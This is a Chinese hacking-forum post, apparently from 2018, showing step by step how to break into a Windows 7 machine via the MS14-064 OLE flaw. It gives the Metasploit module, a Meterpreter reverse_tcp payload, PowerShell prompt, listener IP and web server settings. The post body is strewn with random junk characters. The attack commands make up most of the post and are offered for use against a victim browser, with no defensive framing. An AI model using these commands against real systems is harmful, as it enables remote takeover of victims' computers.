找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2103|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

% b4 @ B' }# F5 d* H 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示$ f; Q2 |( A; Z5 ?

5 H; r( R6 u4 n. w' A/ M' r, ~

4 ~$ n3 `7 r! H o9 {* ^5 w 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 4 u( O6 k1 @" j m8 R# j

, w8 g( `- s" a7 ^5 p) ^# [! k

8 g. \5 @1 e% j; ^& E- ] 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp: o: A* l! T/ P% H! h/ I( t

0 \8 [" k, t$ f: L

# R% o3 k8 i$ |+ ?3 @! p             set AllowPowershellPrompt true 5 C: _. E+ H& G6 X# j- q' _8 j; n& @

/ g2 g0 j( y6 c/ X$ w

2 @% n# v" W; u" g             Set LHOST 192.168.0.109 # R8 [0 J% _& t- o0 X% v0 p

9 D0 |! I8 y* H8 v

( i8 e0 m" i+ x0 C             set SRVHOST 192.168.0.109$ ]' @6 q: G! k2 B7 Q1 H' N9 W

K7 E) C0 K4 D* a

) w& b+ ^# }4 P; d             Set uripath share $ I+ B8 Q) v! F5 r

1 ]. q8 r" r v; l. ]! P& M1 f0 ?

9 D& ~, o% ~2 m$ H; B1 M* y             Set srvport 80 ( _( k& A9 s' T* y5 N0 U

S2 G# ]$ v- R, J

& W! R0 `# k; c. M0 ]7 \ X) ?  0 \ o% |2 _! Z: G+ }

/ [/ o( \# o) q4 y

% k8 F5 ]/ u8 S9 {  1 I2 J5 @7 a% |* u+ l: F; m: E0 T

* K& p9 ?& E( ^: ~: [

, j" e: X0 R( c& u   # Z. t+ J3 z9 g) b: D3 |* p- U

1 x( ]% f3 V5 l# m3 N

+ S. C, K: [" y% p0 v1 V  % v6 R' L# }" b, J* B% e/ j: j

) O/ S- o; s: p" {

+ J& n5 _0 f& r$ O$ B s+ Y   * X+ _/ g" }! H4 V: @4 n( x, N8 i$ H

+ h% b) Y6 C" G4 i1 j- D4 \

: b' z6 @0 ?9 a2 U+ f3 M7 }. Q 下面我们来访问本地地址如图: 6 a( e/ a* F4 y5 C9 O/ d: z

. x' b5 f* v+ S" M

7 \; i& A& h: [. i  7 I' v% I( d+ A. q

& w0 u1 G* {$ e8 i

) A$ ^9 N. k. g0 F6 g  3 B( _7 r* a d+ F

$ N; Q4 h- _/ x7 H, X

: }6 h* G5 V8 l+ x% C 2 r1 J' E: l' w4 |; |% i" ~& k

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表